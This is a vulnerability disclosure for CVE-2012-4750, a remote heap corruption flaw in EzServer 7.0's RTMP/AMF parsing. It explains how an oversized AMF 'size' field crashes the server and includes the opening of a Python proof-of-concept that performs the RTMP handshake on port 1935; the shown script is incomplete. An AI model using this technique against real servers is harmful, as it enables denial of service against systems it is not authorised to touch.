EzServer version 7.0 is affected by a remote heap corruption vulnerability. Version 6.x is not affected by this issue, as does not implement RTMP support.
A remote unauthenticated attacker can DoS the application. Remote Command Execution could be possible, however an exploit has yet to be developed.
The vulnerability is caused by the following lines of code:
The application pass to memcpy() an uncontrolled size, which is directly taken from the AMF request in the RTMP packet.After have successfully completed the RTMP handshake, an attacker can send a malformed AMF request embedded in the RTMP session, with an high value for the 'size' field (2 bytes, such as 0xFFFF) and a lower-sized 'string' (such as 'connect'). This result in a heap corruption and a crash for the application.
[Fix]:
Support for the RTMP protocol appears disabled (but not fully removed) in version 7.1. However there is no official response from the vendor (see disclosure).
[Proof of Concept code]:
http://pastebin.com/k05djr6C
#Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerability POC code
#Author: Lorenzo Cantoni
#CVE-CVE-2012-4750
#Link to vulnerable software: http://www.4shared.com/zip/eVs9I2Gf/ezserver70001_win.html
from socket import *
import sys
import os
import time
if len(sys.argv) >=2:
server = sys.argv[1]
else:
server ="192.168.1.65"
s = socket(AF_INET, SOCK_STREAM)
s.connect((server,1935))
# Handshake C0+C1 (sent by client)
s.send(c0c1)
time.sleep(2)
# Handshake S0+S1+S2 (sent by server)
s0s1s2= s.recv(1700)
time.sleep(2)
# Handshake C2
#parse the payload which has to be echoed back to the server
echo = s0s1s2[1:1537]
